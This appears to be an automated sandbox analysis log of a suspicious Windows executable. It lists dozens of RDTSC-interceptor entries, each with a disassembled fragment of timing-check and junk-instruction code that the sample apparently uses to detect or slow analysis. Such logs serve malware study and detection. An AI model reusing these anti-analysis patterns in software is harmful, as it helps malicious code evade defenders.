Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 388738 second address: 38873C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38873C second address: 388742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3877ED second address: 3877F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3877F1 second address: 3877F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3877F5 second address: 387818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F3A94CD4089h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 387818 second address: 387901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx edi, dx 0x00000027 mov dword ptr [ebp+124553B9h], ebx 0x0000002d cmc 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr [ebp+122D2EBCh], eax 0x0000003b stc 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov ebx, dword ptr [ebp+122D2C76h] 0x00000049 mov eax, dword ptr [ebp+122D0189h] 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F3A9502B5E8h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 call 00007F3A9502B5F0h 0x0000006e jmp 00007F3A9502B5F9h 0x00000073 pop ebx 0x00000074 push FFFFFFFFh 0x00000076 mov ebx, dword ptr [ebp+122D2381h] 0x0000007c nop 0x0000007d jl 00007F3A9502B5FAh 0x00000083 jmp 00007F3A9502B5F4h 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jns 00007F3A9502B5ECh 0x00000091 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3896A1 second address: 3896C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A94CD407Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3A94CD407Ch 0x00000013 jg 00007F3A94CD4076h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3889BF second address: 3889C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38A7C5 second address: 38A7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38984F second address: 389853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 389853 second address: 389859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 389859 second address: 38987C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5EBh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F3A9502B5EDh 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 389959 second address: 38995F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38995F second address: 389965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38A8D7 second address: 38A8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38A8DE second address: 38A943 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A9502B5F1h 0x0000000e nop 0x0000000f jns 00007F3A9502B5E8h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+122D2928h], esi 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov bx, C353h 0x0000002d mov eax, dword ptr [ebp+122D1491h] 0x00000033 push FFFFFFFFh 0x00000035 jmp 00007F3A9502B5F7h 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e jng 00007F3A9502B5E6h 0x00000044 pop esi 0x00000045 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38A943 second address: 38A95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4083h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38C7C0 second address: 38C7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5EAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38F7A7 second address: 38F7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38F7B2 second address: 38F7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38F7B6 second address: 38F832 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d jl 00007F3A94CD4078h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 nop 0x00000017 mov bx, si 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D194Ah] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F3A94CD4078h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e stc 0x0000003f xchg eax, esi 0x00000040 jmp 00007F3A94CD4086h 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F3A94CD4086h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38F832 second address: 38F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 390961 second address: 390967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 390967 second address: 39096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39096C second address: 3909DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F3A94CD4078h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, esi 0x00000027 sbb di, E6FAh 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F3A94CD4078h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 movzx ebx, bx 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F3A94CD4082h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3909DB second address: 3909E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3918A5 second address: 3918AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38FAD6 second address: 38FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38FAE0 second address: 38FAE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 38FAE4 second address: 38FAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007F3A9502B5ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39292E second address: 392932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 392A92 second address: 392B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D363Ah], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jo 00007F3A9502B5EBh 0x00000024 mov edi, 5866FBD4h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F3A9502B5E8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D3645h] 0x00000050 mov eax, dword ptr [ebp+122D094Dh] 0x00000056 or edi, dword ptr [ebp+124822A2h] 0x0000005c mov edi, dword ptr [ebp+122D2D2Ah] 0x00000062 push FFFFFFFFh 0x00000064 jnc 00007F3A9502B5F1h 0x0000006a nop 0x0000006b jmp 00007F3A9502B5F3h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 392B3B second address: 392B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 392B3F second address: 392B45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39498F second address: 394993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 394993 second address: 394999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 394999 second address: 39499E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39C0FE second address: 39C106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39C106 second address: 39C10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39B9A1 second address: 39B9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39B9B6 second address: 39B9D6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4082h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39BB08 second address: 39BB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 39BB13 second address: 39BB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A20EC second address: 3A2113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007F3A9502B5FBh 0x0000000e jmp 00007F3A9502B5F5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A2113 second address: 3A212C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3A94CD407Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A212C second address: 3A2136 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A2136 second address: 3A2148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A2148 second address: 3A2157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A2157 second address: 3A215B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A238F second address: 3A2394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A2394 second address: 3A2399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A7764 second address: 3A7783 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A6B03 second address: 3A6B08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A6B08 second address: 3A6B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F3A9502B5E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A6F0D second address: 3A6F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A6F13 second address: 3A6F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A6F1F second address: 3A6F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A75D2 second address: 3A75D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A75D6 second address: 3A75DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A75DE second address: 3A75F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3A9502B5ECh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A75F4 second address: 3A75FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3A75FA second address: 3A75FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 336309 second address: 33630D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33630D second address: 336329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 336329 second address: 33632F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 33632F second address: 33634C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B073D second address: 3B0751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B0751 second address: 3B0755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B0755 second address: 3B0761 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B0FE3 second address: 3B0FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B115B second address: 3B1169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B143B second address: 3B1441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 360F8A second address: 360F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 360F8E second address: 360FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F4h 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3399A1 second address: 3399A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B66D9 second address: 3B66F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F3h 0x00000009 jg 00007F3A9502B5E6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B66F6 second address: 3B66FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B685D second address: 3B6869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B6869 second address: 3B686E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B686E second address: 3B6883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3A9502B5E6h 0x0000000a jmp 00007F3A9502B5EBh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B6883 second address: 3B68A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007F3A94CD4076h 0x0000000d jmp 00007F3A94CD407Ch 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B68A4 second address: 3B68AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B68AD second address: 3B68B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B6BC9 second address: 3B6BDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B6BDF second address: 3B6BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 3B7019 second address: 3B701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
